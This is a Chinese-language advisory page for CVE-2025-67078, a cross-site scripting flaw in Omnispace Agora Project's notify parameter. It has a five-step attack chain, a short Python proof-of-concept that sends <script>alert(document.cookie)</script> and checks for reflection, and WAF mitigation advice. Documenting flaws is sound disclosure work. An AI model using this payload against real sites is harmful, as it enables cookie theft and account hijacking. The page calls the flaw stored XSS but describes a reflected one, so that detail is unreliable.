CVE-2025-67078 CVSS 6.1 中危

CVE-2025-67078: Omnispace Agora Project 跨站脚本漏洞

披露日期: 2026-01-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-67078

漏洞类型

跨站脚本攻击（XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Omnispace Agora Project

漏洞概述

CVE-2025-67078是Omnispace Agora Project中的一个存储型跨站脚本（XSS）漏洞。该漏洞存在于文件控制器的notify参数中，用于显示错误信息。由于应用程序未对用户输入进行充分的过滤和转义，攻击者可以通过该参数注入恶意JavaScript代码。当其他用户访问包含恶意脚本的页面时，攻击脚本将在受害者浏览器中执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等严重后果。该漏洞无需认证即可利用，但需要用户交互才能触发。CVSS评分为6.1，属于中危级别。攻击复杂度低，影响范围包括机密性和完整性，低可用性影响。

技术细节

该XSS漏洞位于Omnispace Agora Project的文件控制器中，具体在处理notify参数时未进行适当的输入验证和输出编码。攻击者可以通过构造包含恶意JavaScript代码的URL来利用此漏洞，例如在notify参数中注入<script>alert(document.cookie)</script>等Payload。当应用程序将该参数值回显到错误页面时，恶意脚本会被浏览器解析执行。由于漏洞存在于错误处理逻辑中，任何能够触发错误显示的场景都可能成为攻击向量。攻击者可以利用此漏洞窃取用户会话Cookie、劫持用户账户或进行进一步的社会工程攻击。

攻击链分析

STEP 1

步骤1

攻击者构造恶意URL，在notify参数中注入XSS Payload，如<script>alert(document.cookie)</script>

STEP 2

步骤2

攻击者诱使受害者访问包含恶意脚本的URL，触发错误显示功能

STEP 3

步骤3

应用程序未对notify参数进行过滤和编码，直接将恶意脚本回显到错误页面

STEP 4

步骤4

受害者浏览器解析并执行注入的JavaScript代码，攻击者因此获取用户Cookie或执行其他恶意操作

STEP 5

步骤5

攻击者利用窃取的会话信息劫持用户账户或进行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-67078 PoC - XSS in Omnispace Agora Project
# Target: Omnispace Agora Project < 25.10
# Attack Vector: notify parameter in file controller

target_url = "http://target.com/agora/index.php/file/index"

# Malicious payload - XSS via notify parameter
xss_payload = "<script>alert(document.cookie)</script>"

# Construct exploit URL
exploit_url = f"{target_url}?notify={requests.utils.quote(xss_payload)}"

print(f"[*] Sending XSS payload to: {target_url}")
print(f"[*] Payload: {xss_payload}")

try:
    response = requests.get(exploit_url, timeout=10)
    
    if xss_payload in response.text:
        print("[+] XSS payload reflected in response - Vulnerability confirmed!")
    else:
        print("[-] Payload not found in response")
        
except requests.exceptions.RequestException as e:
    print(f"[-] Request failed: {e}")

影响范围

Omnispace Agora Project < 25.10

防御指南

临时缓解措施

在修复版本发布之前，可通过Web应用防火墙（WAF）规则暂时过滤notify参数中的危险字符，如<>、script等标签符号。同时建议限制错误信息的详细程度，避免直接回显用户输入内容。对所有用户可控的输出点进行安全审计，确保使用上下文相关的输出编码方法。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-67078
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-67078
3 Details https://www.cvedetails.com/cve/CVE-2025-67078/
4 VulDB https://vuldb.com/cve/CVE-2025-67078
5 Link https://www.agora-project.net
6 Link https://www.helx.io/blog/advisory-agora-project/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表